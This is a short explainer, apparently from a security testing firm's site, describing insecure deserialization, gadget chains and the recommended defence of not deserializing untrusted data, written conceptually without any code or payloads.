Deserialization is the process of reconstructing an object from its serialized (stored or transmitted) format back into a live, usable object in memory. Serialization converts objects into a format suitable for storage or transmission (such as JSON, XML, or binary formats), and deserialization reverses this process. Insecure deserialization occurs when an application deserializes untrusted data without proper validation, potentially allowing an attacker to manipulate the serialized data to execute arbitrary code, tamper with application logic, or escalate privileges.
How It Works
Many programming languages provide native serialization mechanisms that can reconstruct complex objects, including their types, properties, and relationships. When an application deserializes data that an attacker can control, the attacker can manipulate the serialized payload to create objects of arbitrary types. If the application has classes that perform dangerous operations during deserialization (such as executing system commands in their constructors or destructors), the attacker can chain these classes together to achieve code execution.
In Java, for example, an attacker can craft a serialized object that, when deserialized, triggers a sequence of method calls across multiple classes (called a gadget chain) that ultimately executes an arbitrary command. Similar attacks exist in PHP, Python, Ruby, and .NET. The attacker does not need to inject new code; they exploit existing classes in the application and its dependencies to construct a chain that achieves their objective.
Even without achieving code execution, insecure deserialization can enable other attacks. Modifying serialized session data might allow privilege escalation. Tampering with serialized business objects might manipulate prices, quantities, or permissions. Injecting unexpected object types might cause crashes or reveal internal error information.
Why It Matters
Insecure deserialization often leads to remote code execution, the most severe category of vulnerability. Security assessments identify deserialization attack surfaces by locating endpoints that accept serialized data, particularly native serialization formats rather than safer alternatives like JSON. The recommended defense is to avoid deserializing untrusted data entirely or to use data-only formats that do not support object reconstruction.
Need your application tested? Get in touch.